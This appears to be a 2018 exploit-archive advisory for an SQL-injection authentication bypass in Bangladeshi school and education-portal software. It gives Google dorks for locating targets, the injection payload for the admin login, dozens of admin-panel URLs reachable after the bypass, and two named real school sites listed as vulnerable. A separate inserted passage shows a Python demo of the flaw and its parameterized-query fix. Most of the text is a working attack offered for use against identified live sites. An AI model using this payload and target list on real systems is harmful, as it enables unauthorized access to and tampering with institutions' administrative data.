
Rubel Chandra Shil Mirsarai Chittagong Muktagachha Mymensingh Bypass Vulnerability

Author: KingSkrupellos, Published: 09-10-2018
#################################################################################################

# Exploit Title : Rubel Chandra Shil Mirsarai Chittagong Muktagachha Mymensingh Authentication Bypass Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 10/10/2018
# Vendor Homepage : mymensingh.gov.bd ~ chittagong.gov.bd
# Tested On : Windows and Linux
# Google Dorks :
intext:''পরিকল্পনা ও বাস্তবায়নে : মো. নজরুল ইসলাম, মুক্তাগাছা, ময়মনসিংহ।'' site:edu.bd
intext:পরিকল্পনা ও বাস্তবায়নে : মো. নজরুল ইসলাম, মুক্তাগাছা, ময়মনসিংহ।'' site:edu.bd
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-592 [ Authentication Bypass Issues ]

#################################################################################################

# Exploit Title =>

Planning and Implementing Rubel Chandra Shil Mirsarai Chittagong Bangladesh Education Portals Authentication Bypass Vulnerability

Planning and implementing: Md. Nazrul Islam, Muktagachha, Mymensingh Education Portals Authentication Bypass Vulnerability

# Admin Panel Login Path :

/administrator/login.php
/administrator/index.php

# Authentication Bypass Exploit :

Admin Username : 1' or 1=1 -- -

Admin Password : 1' or 1=1 -- -
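As an added illustration (not the advisory's or the vendor's code), the following Python snippet models the two login patterns behind this class of bug against a constructed in-memory SQLite table with a hypothetical `admin` schema: a string-concatenated query that the advisory's payload turns into a tautology, beside the parameterized query that treats the same input as plain data.

```python
import sqlite3


def make_db():
    # Constructed stand-in for the portal's admin table (hypothetical schema).
    # Real code must store a password hash, not the plaintext used here for brevity.
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE admin (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    con.execute("INSERT INTO admin (username, password) VALUES ('admin', 'S3cret!')")
    return con


def login_vulnerable(con, username, password):
    # The flawed pattern: submitted values are spliced into the SQL text, so a
    # quote closes the literal, "or 1=1" makes the WHERE clause always true and
    # "-- -" comments out the rest of the statement. Returns True on "success".
    sql = ("SELECT id FROM admin WHERE username = '" + username +
           "' AND password = '" + password + "'")
    return con.execute(sql).fetchone() is not None


def login_fixed(con, username, password):
    # Mitigation: bound parameters. The driver sends the values separately from
    # the statement, so quotes and comment markers in the input never become syntax.
    sql = "SELECT id FROM admin WHERE username = ? AND password = ?"
    return con.execute(sql, (username, password)).fetchone() is not None


if __name__ == "__main__":
    con = make_db()
    payload = "1' or 1=1 -- -"  # the string from the advisory above
    print("concatenated query bypassed:", login_vulnerable(con, payload, payload))
    print("parameterized query bypassed:", login_fixed(con, payload, payload))
    print("parameterized query, valid creds:", login_fixed(con, "admin", "S3cret!"))
```

In PHP the equivalent fix is a prepared statement via PDO or mysqli with bound parameters in `login.php`, plus a server-side session check on every `administrator/index.php?option=...` handler so that the panel pages are not reachable without a valid login.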

# Usable Admin Control Panel URL Links :

# Exploits for Authentication Bypass =>

/administrator/index.php?option=oneView&direction=list
/administrator/index.php?option=oneview&direction=entry
/administrator/index.php?option=firstPage&direction=entry
/administrator/index.php?option=infrastructure&direction=list
/administrator/index.php?option=infrastructure&direction=entry
/administrator/index.php?option=infrastructure&&direction=edit&&id=1
/administrator/index.php?option=committee&direction=list
/administrator/index.php?option=committee&&direction=edit&&id=1
/administrator/index.php?option=committee&direction=entry
/administrator/index.php?option=principal&direction=list
/administrator/index.php?option=principal&direction=entry
/administrator/index.php?option=teacher&direction=list
/administrator/index.php?option=teacher&direction=entry
/administrator/index.php?option=student&direction=list
/administrator/index.php?option=student&direction=entry
/administrator/index.php?option=studentAchievement&direction=list
/administrator/index.php?option=studentAchievement&direction=entry
/administrator/index.php?option=curriculum&direction=list
/administrator/index.php?option=curriculum&direction=entry
/administrator/index.php?option=cocurriculum&direction=list
/administrator/index.php?option=cocurriculum&direction=entry
/administrator/index.php?option=cocurriculum&&direction=edit&&id=1
/administrator/index.php?option=coCurriculum&direction=list
/administrator/index.php?option=coCurriculum&direction=entry
/administrator/index.php?option=calander&direction=list
/administrator/index.php?option=calander&direction=entry
/administrator/index.php?option=holiday&direction=list
/administrator/index.php?option=holiday&direction=entry
/administrator/index.php?option=contact&direction=list
/administrator/index.php?option=contact&direction=entry
/administrator/index.php?option=library&direction=list
/administrator/index.php?option=library&direction=entry
/administrator/index.php?option=links&direction=list
/administrator/index.php?option=links&direction=entry
/administrator/index.php?option=links&&direction=edit&&id=1
/administrator/index.php?option=download&direction=list
/administrator/index.php?option=download&direction=entry
/administrator/index.php?option=notice&direction=list
/administrator/index.php?option=notice&&direction=edit&&id=1
/administrator/index.php?option=notice&direction=entry
/uploads/school_notice_[RANDOM-NUMBER].jpg .gif .png
/administrator/index.php?option=latest&direction=list
/administrator/index.php?option=latest&direction=entry
/administrator/index.php?option=latest&&direction=edit&&id=1
/administrator/index.php?option=classRoutine&direction=list
/administrator/index.php?option=classRoutine&direction=entry
/administrator/index.php?option=slider&direction=list
/administrator/index.php?option=slider&&direction=edit&&id=2
/administrator/index.php?option=slider&direction=entry
/slider/slider/....
/administrator/index.php?option=gallery&direction=list
/administrator/index.php?option=gallery&&direction=edit&&id=1
/administrator/index.php?option=gallery&direction=entry
/uploads/gallery/school_gallery_images_[RANDOM-NUMBER].jpg .gif .png
/administrator/index.php?option=siteconfig&direction=edit&id=1

# Example Vulnerable Sites =>

ghpngh.edu.bd => [ Proof of Concept ] => archive.is/vyRpF

jhaljhaliaesk.edu.bd => [ Proof of Concept ] => archive.is/5sc7n

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

# CXSecurity : cxsecurity.com/ascii/WLB-2018100091

#################################################################################################
